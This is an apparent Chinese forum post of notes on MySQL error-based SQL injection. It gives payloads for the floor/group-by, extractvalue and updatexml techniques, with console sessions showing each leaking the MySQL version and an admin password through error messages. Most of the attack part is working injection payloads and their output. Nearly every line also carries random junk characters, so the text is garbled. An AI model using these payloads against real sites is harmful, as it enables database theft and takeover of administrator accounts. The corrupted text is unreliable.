放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。8 }$ n% P1 f7 K8 y- j
实际测试环境:5 [% G; L3 @. A. d1 u, d
" o- O5 ^9 _) N5 q* T/ f. U
" n' W6 Q8 H! A+ V. y+ Vmysql> show tables;
; ]0 r6 J" N Y: G+----------------+
* c z+ g% { r| Tables_in_test |
; O5 p; I5 l6 J+----------------+/ y6 L! c5 o5 _0 i: r7 m9 r1 _
| admin |, b; X, ^8 {+ n& Q% E; Q! n. f
| article |
% E$ J, `5 \% v# D" g$ {$ b+----------------+" x4 T! J9 B) }3 Z3 \+ z
" F3 j4 ?6 S, i! Z
2 t! m5 W) {& m, I& k+ F7 p ' ?* r% O* @6 z# n7 D2 h% @
mysql> describe admin;, s9 V" \ _2 e! M. A$ M- z* l
+-------+------------------+------+-----+---------+----------------+0 _. P9 W# R: x; n
| Field | Type | Null | Key | Default | Extra | m6 r& `( C9 Z, _
+-------+------------------+------+-----+---------+----------------+$ I. B' B0 @( K. t. }
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |7 ~/ A9 O5 E: k( x
| user | varchar(50) | NO | | NULL | |
6 p4 o. A: k: Q4 |/ @| pass | varchar(50) | NO | | NULL | |+ ]; p9 f! O7 b3 t" L
+-------+------------------+------+-----+---------+----------------+
/ B& s: w; b! o+ E! ?. ~
7 O9 f# m! I2 [5 w5 w6 U" }
+ T% J; N& r' ^( U! z
0 i/ {' P. C$ m" d8 @mysql> describe article;( r: f! g/ w* i: P o
+---------+------------------+------+-----+---------+----------------+
, Y4 B; Q9 f3 j" P| Field | Type | Null | Key | Default | Extra |
5 U. T3 A5 ?/ V% ?, Q+---------+------------------+------+-----+---------+----------------+
' z) k2 W- }1 a: e4 N% @| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
) g' P# l. ~* q| title | varchar(50) | NO | | NULL | |
) ~+ ~+ g4 I. m6 t/ t. q0 t! N$ P| content | varchar(50) | NO | | NULL | |( u3 ~( ]5 l6 _8 |, x7 g
+---------+------------------+------+-----+---------+----------------+
7 W0 C* B: p2 O Z/ S: O+ ^1、通过floor报错( a$ j; h/ x J' @
可以通过如下一些利用代码0 ~/ j+ E \8 s |5 p+ F2 p0 c
) l8 H5 {$ R0 g H9 q) Q7 x
4 l% ~1 u# i$ h' P4 \! _# yand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x0 d {3 E, \' f ?# y1 ?5 L+ m
from information_schema.tables group by x)a);/ [1 {9 q' l! j* j1 p% \
! `! C8 t9 s G- B* y, {
2 I4 W; ] v3 j; L* X; p
and (select count(*) from (select 1 union select null union select !1)x) c+ O' ]" H2 k2 b6 j
group by concat((select table_name from information_schema.tables limit 1),
8 [# b- y" i9 a0 H, r3 Q0 ?$ afloor(rand(0)*2)));
5 P- p$ t7 _% [+ m6 h) f% F举例如下:
. b- }/ b1 A4 H& }7 q首先进行正常查询:. n0 V% f! b) E9 Z5 W$ m# Q7 D1 {
* h' Z: x/ J) v' x1 C) r6 H
mysql> select * from article where id = 1;
$ u2 k$ ]" H6 o1 ]/ i4 K: d( Y+----+-------+---------+
2 t( I- q) W7 a8 u% D" c| id | title | content |6 `3 E" {5 z3 Z# g+ ~
+----+-------+---------+. R1 Z0 W$ r9 C
| 1 | test | do it |
# O! @' W' N I0 b+----+-------+---------+8 b# }* s2 ~$ u- L. s
假如id输入存在注入的话,可以通过如下语句进行报错。' G/ d$ P1 ]1 U) S+ V- t/ u
5 H7 i6 k$ p3 e! M1 u% T E
* E8 q9 s; w; Z+ K$ G! C
mysql> select * from article where id = 1 and (select 1 from
9 X0 h/ u3 C, a3 [' W; U6 C(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
$ c" {! z; u1 aERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'7 |* C$ A8 o5 f, n3 s% Y
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。8 ^# y+ i0 c# S' X
例如我们需要查询管理员用户名和密码:2 T" q2 M! q6 s+ i# q# a2 c1 L
Method1:+ Z; z7 S$ v. n# @
$ F5 H# r( v! d# w5 r " p7 v; B. a/ M; p& [2 u6 q
mysql> select * from article where id = 1 and (select 1 from
5 n8 \) o7 o6 E3 g7 j(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
: R3 P; m" y1 a; p# jfrom information_schema.tables group by x)a);
: d) e% l: @3 F8 g- WERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'9 Q `' `. j% {* _+ c- Z
Method2:
5 z, O9 G8 R9 v' b# w
1 U$ w+ [6 T& T" p# d3 n 6 s( _" Z+ \( y1 o
mysql> select * from article where id = 1 and (select count(*)
" S _0 X' e1 y' f0 J8 Tfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),% _4 ~9 `! s. U7 r& q) V+ H
floor(rand(0)*2)));
& J5 z+ _" I! AERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
, D9 E+ T8 Y$ Z% l. v" l! B: n6 Y8 f2、ExtractValue
M- I$ K' j( V+ Y6 a3 W测试语句如下- z, m2 R/ Y# m2 J- {) @( B9 B
0 c4 ~! M4 X( \
5 e( }6 P; r0 O/ d' E k( H% B0 a Eand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
$ o/ [$ I* f3 D: W, h$ E实际测试过程
2 T* p4 r: B3 o9 q/ ^ + b& N" L d+ r" G
! |! Q. j" k) z9 q8 f
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
0 g/ U' k( y1 @3 b) W(select pass from admin limit 1)));--
7 c( y6 X/ Z' D x& v' n! O2 w4 s/ gERROR 1105 (HY000): XPATH syntax error: '\admin888'
4 q, d7 N) y- u2 Q! A. }# X" _- [3、UpdateXml/ v* i3 L& f2 C% k% e
测试语句
$ w2 D2 a, e6 m! k. b& i' b
$ ^! @5 ?$ G& i+ L# Z& A % F( \2 e8 R/ z, v. G' U; L3 I( }
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))% b3 i3 m) c1 E c! [; O
实际测试过程3 e4 i1 {& Y5 C* i
2 K/ S% x4 ^8 [* W! K( X# w' p $ a- g5 g- S1 s
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
. ^2 X- i O" e(select pass from admin limit 1),0x5e24),1));
# B- j( ]/ v. T' MERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'0 `$ e" R9 e! }* Z- d
All, thanks foreign guys.
5 M4 c- V2 g r _/ T 4 @2 l( h& r! I1 G4 ^; V
2 J* Q$ f) r. g5 e3 g7 S |
发表于 2012-12-10 10:28:51
收藏
支持
反对